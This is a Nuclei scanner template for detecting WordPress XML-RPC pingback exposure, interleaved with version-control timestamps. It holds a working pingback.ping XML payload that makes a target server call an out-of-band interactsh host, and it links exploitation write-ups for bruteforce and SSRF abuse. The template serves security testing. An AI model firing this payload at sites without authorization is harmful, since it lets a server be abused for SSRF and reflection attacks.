2021-09-21 15:18:49 +05:30
id : wp-xmlrpc-pingback-detection
info :
2024-09-10 14:34:53 +04:00
name : Wordpress XMLRPC - Pingback Detection
2021-09-21 15:18:49 +05:30
author : pdteam
severity : info
2024-01-02 21:15:12 +05:30
description : WordPress XML-RPC Pingback Detection refers to the identification and monitoring of XML-RPC Pingback functionality in a WordPress website. This is vulnerable to pingback detection and bruteforce attacks.
2021-09-21 15:18:49 +05:30
reference :
- https://github.com/dorkerdevil/rpckiller
- https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32
2023-04-28 13:41:21 +05:30
metadata :
2024-09-10 14:34:53 +04:00
max-request : 2
2023-10-14 16:57:55 +05:30
tags : wordpress,ssrf,oast,xmlrpc
2021-09-21 15:18:49 +05:30
2024-09-10 14:34:53 +04:00
flow : http(1) && http(2)
2023-04-27 09:58:59 +05:30
http :
2024-09-10 14:34:53 +04:00
- raw :
- |
GET /xmlrpc.php HTTP/1.1
Host : {{Hostname}}
Cookie : humans_21909=1
matchers :
- type : word
words :
- 'XML-RPC server accepts POST requests only.'
internal : true
2021-09-21 15:18:49 +05:30
- raw :
- |
POST /xmlrpc.php HTTP/1.1
Host : {{Hostname}}
<methodCall>
<methodName>pingback.ping</methodName>
<params>
<param>
<value>
<string>http://{{interactsh-url}}</string>
</value>
</param>
<param>
<value>
<string>{{BaseURL}}/?p=1</string>
</value>
</param>
</params>
</methodCall>
matchers :
- type : word
part : interactsh_protocol
words :
- "http"
2024-09-08 04:35:13 +08:00
- "dns"
2024-09-10 12:06:39 +05:30
condition : or
2024-12-01 13:57:55 +00:00
# digest: 4a0a00473045022079f8ba3f9d5792206f42ff152a12d23033d039d5f19165d64fdf1682341ae671022100bf2ba07040e83c38586683cdcc572f3d9f7ac87d7e7ac8391a44537039b34f2b:922c64590222798bb761d5b6d8e72950
